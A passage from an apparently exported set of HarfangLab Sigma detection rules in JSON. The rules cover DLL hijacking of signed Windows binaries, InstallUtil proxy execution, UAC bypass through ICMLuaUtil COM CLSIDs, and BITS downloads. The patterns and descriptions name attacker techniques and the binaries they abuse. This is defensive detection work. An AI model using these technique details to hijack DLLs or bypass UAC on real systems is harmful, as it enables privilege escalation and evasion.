"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b3797e1-49d8-453d-aa91-119bf4574c17",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591091Z",
"creation_date": "2026-03-23T11:45:34.591095Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591102Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_waitfor.yml",
"content": "title: DLL Hijacking via waitfor.exe\nid: 5b3797e1-49d8-453d-aa91-119bf4574c17\ndescription: |\n Detects potential Windows DLL Hijacking via waitfor.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'waitfor.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b3797e1-49d8-453d-aa91-119bf4574c17",
"rule_name": "DLL Hijacking via waitfor.exe",
"rule_description": "Detects potential Windows DLL Hijacking via waitfor.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b48cbef-ef63-4129-ad19-8865b975a9a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071024Z",
"creation_date": "2026-03-23T11:45:34.071026Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071030Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Installutil/",
"https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/",
"https://attack.mitre.org/techniques/T1218/004/"
],
"name": "t1218_004_installutil_suspicious_execution.yml",
"content": "title: Suspicious Proxy Execution via InstallUtil\nid: 5b48cbef-ef63-4129-ad19-8865b975a9a2\ndescription: |\n Detects the suspicious usage of InstallUtil which is a Microsoft binary used for installing and uninstalling server resources.\n This utility is part of the .NET Framework and can be used to run any .NET executables.\n Attackers may abuse this binary to bypass security restrictions.\n It is recommended to verify the legitimacy of the executable launched by InstallUtil.\n The parent process can also be a good indicator about the InstallUtil's execution context, such as the result of a legitimate software installation.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Installutil/\n - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/\n - https://attack.mitre.org/techniques/T1218/004/\ndate: 2023/04/04\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.InstallUtil\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'InstallUtil.exe'\n CommandLine|contains|all:\n - '/logfile= '\n - '/LogToConsole=false'\n\n exclusion_programfiles:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_msiexec:\n CommandLine|endswith:\n - ' ?:\\Program Files\\Microsoft System Center\\Virtual Machine Manager\\bin\\Microsoft.SystemCenter.VirtualMachineManager.dll'\n - ' ?:\\Program Files\\Citrix\\Virtual Desktop Agent\\upmWmiMetrics.dll /logfile= /LogToConsole=FALSE'\n - ' ?:\\Program Files\\Citrix\\Virtual Desktop Agent\\upmWmiAdmin.dll /logfile= /LogToConsole=FALSE'\n - ' ?:\\Program Files\\Citrix\\User Profile Manager\\ISessionMetrics.exe /logfile= /LogToConsole=FALSE'\n - ' /Uninstall /LogFile= /LogToConsole=true /ShowCallStack ?:\\Program Files\\Citrix\\CdfCaptureService\\CdfCaptureService.exe'\n ParentImage: '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_devexpress:\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 20.1\\Components /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 20.1\\Components /Version=20.1.7 /Component=XPOWizard /DemosName= /VSVersions=VS110;VS120;VS140;VS150;VS160; C:\\Program Files (x86)\\DevExpress 20.1\\Components\\System\\XPOWizard\\DevExpress.Xpo.v20.1.Installer.dll\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 20.2\\Components /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 20.2\\Components /Version=20.2.12 /Component=XtraReportsCommon /DemosName= /VSVersions=VS110;VS120;VS140;VS150;VS160; C:\\Program Files (x86)\\DevExpress 20.2\\Components\\System\\XtraReportsCommon\\DevExpress.XtraReports.v20.2.Installer.dll\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 20.2\\Components /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 20.2\\Components /Version=20.2.12 /Component=DevExpressMenu /DemosName= /VSVersions=VS110;VS120;VS140;VS150;VS160; C:\\Program Files (x86)\\DevExpress 20.2\\Components\\System\\DevExpressMenu\\Bin\\DevExpress.Menu.Installer.dll\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 17.2\\DevExtreme /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 17.2\\DevExtreme /Version=17.2.5 /Component=DevExtreme HTML JS /DemosName=HTML JS /VSVersions=VS100;VS110;VS120;VS140;VS150; C:\\Program Files (x86)\\DevExpress 17.2\\DevExtreme\\System\\DevExtreme HTML JS\\DXTreme.VsixInstaller.dll\n CommandLine|contains|all:\n - 'InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir='\n - '/DemosDir='\n - '/Component='\n - '/DemosName='\n - '\\DevExpress '\n\n exclusion_mysql:\n CommandLine|startswith:\n - '?:\\WINDOWS\\Microsoft.NET\\Framework\\v*\\installUtil.exe /LogToConsole=false * ?:\\Program Files (x86)\\MySQL\\MySQL Connector Net *\\'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installUtil.exe /LogToConsole=false * ?:\\Program Files (x86)\\MySQL\\Connector.NET *\\'\n\n exclusion_kofax:\n CommandLine|startswith: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\InstallUtil.exe * ?:\\Program Files (x86)\\Kofax\\Capture\\Bin\\'\n\n exclusion_kardex:\n CommandLine|startswith: '?:\\Program Files (x86)\\KARDEX\\Kardex Power Pick System\\InstallUtil.exe /LogToConsole=false /LogFile= '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b48cbef-ef63-4129-ad19-8865b975a9a2",
"rule_name": "Suspicious Proxy Execution via InstallUtil",
"rule_description": "Detects the suspicious usage of InstallUtil which is a Microsoft binary used for installing and uninstalling server resources.\nThis utility is part of the .NET Framework and can be used to run any .NET executables.\nAttackers may abuse this binary to bypass security restrictions.\nIt is recommended to verify the legitimacy of the executable launched by InstallUtil.\nThe parent process can also be a good indicator about the InstallUtil's execution context, such as the result of a legitimate software installation.\n",
"rule_creation_date": "2023-04-04",
"rule_modified_date": "2025-04-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b70e3f8-bc77-44f7-a1df-f5f015e6ad03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077767Z",
"creation_date": "2026-03-23T11:45:34.077769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077773Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gist.github.com/hfiref0x/a044cb0ad425488e38556408b179cb61",
"https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_icmluautil.yml",
"content": "title: UAC Bypass Executed via ICMLuaUtil\nid: 5b70e3f8-bc77-44f7-a1df-f5f015e6ad03\ndescription: |\n Detects attempts to bypass the UAC via the ICMLuaUtil COM interface.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate surrounding alerts and to correlate them with actions performed by the DLLHost process to determine whether this action is legitimate.\nreferences:\n - https://gist.github.com/hfiref0x/a044cb0ad425488e38556408b179cb61\n - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\n - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/12/03\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1218.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|endswith:\n # CMSTPLUA\n - '\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\n # CMLUAUTIL\n - '\\DllHost.exe /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}'\n # ColorDataProxy\n - '\\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_wireguard:\n Image: '?:\\Program Files\\WireGuard\\wireguard.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b70e3f8-bc77-44f7-a1df-f5f015e6ad03",
"rule_name": "UAC Bypass Executed via ICMLuaUtil",
"rule_description": "Detects attempts to bypass the UAC via the ICMLuaUtil COM interface.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate surrounding alerts and to correlate them with actions performed by the DLLHost process to determine whether this action is legitimate.\n",
"rule_creation_date": "2020-12-03",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1218.003",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b9d91f9-ee6e-4bf2-879a-920f4bf62aca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590815Z",
"creation_date": "2026-03-23T11:45:34.590819Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590826Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_graphics_check.yml",
"content": "title: DLL Hijacking via graphics-check.exe\nid: 5b9d91f9-ee6e-4bf2-879a-920f4bf62aca\ndescription: |\n Detects potential Windows DLL Hijacking via graphics-check.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\graphics-check.exe'\n ProcessSignature: 'Orange View Ltd'\n ImageLoaded|endswith: '\\dxgi.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\iTop'\n - '?:\\Program Files (x86)\\iTop'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\iTop'\n - '?:\\Program Files (x86)\\iTop'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Orange View Ltd'\n - 'iTop Inc.'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b9d91f9-ee6e-4bf2-879a-920f4bf62aca",
"rule_name": "DLL Hijacking via graphics-check.exe",
"rule_description": "Detects potential Windows DLL Hijacking via graphics-check.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ba1dcdf-d94a-4e09-a0ee-104f04e4db05",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090945Z",
"creation_date": "2026-03-23T11:45:34.090947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dirquota.yml",
"content": "title: DLL Hijacking via dirquota.exe\nid: 5ba1dcdf-d94a-4e09-a0ee-104f04e4db05\ndescription: |\n Detects potential Windows DLL Hijacking via dirquota.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dirquota.exe'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\srmtrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ba1dcdf-d94a-4e09-a0ee-104f04e4db05",
"rule_name": "DLL Hijacking via dirquota.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dirquota.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5bbb79dc-a1b1-497f-a6ed-91e61c9724b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079524Z",
"creation_date": "2026-03-23T11:45:34.079526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079530Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/bits/using-windows-powershell-to-create-bits-transfer-jobs",
"https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1197_powershell_download_bits.yml",
"content": "title: BITS Download Started via PowerShell\nid: 5bbb79dc-a1b1-497f-a6ed-91e61c9724b7\ndescription: |\n Detects the suspicious usage of Start-BitsTransfer PowerShell cmdlet.\n This cmdlet can be used to copy or download files via the Background Intelligent Transfer Service (BITS).\n This service is an asynchronous file transfer mechanism and it is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n By default, BITS jobs have a 90 days maximum lifetime if complete or cancel method are not called.\n It is recommended to investigate the parent process for suspicious activities as well as to look for suspicious network connections performed by the svchost.exe process hosting the BITS service.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/bits/using-windows-powershell-to-create-bits-transfer-jobs\n - https://www.mandiant.com/resources/blog/alphv-ransomware-backup\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/06/17\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1197\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Start-BitsTransfer '\n\n #exclusion_serviceportalagent:\n # PowershellCommand|contains|all:\n # - 'function Get-VersionFromString{'\n # - 'function Start-Download {'\n # - '# The progress bar breaks Metis return results'\n # - 'Start-BitsTransfer -Source $Source -Destination $Destination -ErrorAction Stop'\n\n exclusion_programfiles:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_serviceportalagent:\n ProcessOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_sqlservr:\n ProcessGrandparentImage: '?:\\MSSQL??.INS??\\MSSQL\\Binn\\sqlservr.exe'\n\n exclusion_flutter:\n PowershellCommand|contains: '# Copyright 2014 The Flutter Authors. All rights reserved.'\n PowershellScriptPath|endswith: '\\bin\\internal\\update_dart_sdk.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5bbb79dc-a1b1-497f-a6ed-91e61c9724b7",
"rule_name": "BITS Download Started via PowerShell",
"rule_description": "Detects the suspicious usage of Start-BitsTransfer PowerShell cmdlet.\nThis cmdlet can be used to copy or download files via the Background Intelligent Transfer Service (BITS).\nThis service is an asynchronous file transfer mechanism and it is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nBy default, BITS jobs have a 90 days maximum lifetime if complete or cancel method are not called.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for suspicious network connections performed by the svchost.exe process hosting the BITS service.\n",
"rule_creation_date": "2022-06-17",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5bde067c-304d-4d0b-8cb9-50699ac247df",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294931Z",
"creation_date": "2026-03-23T11:45:35.294934Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294940Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md",
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_keychain_export_dump_keychain.yml",
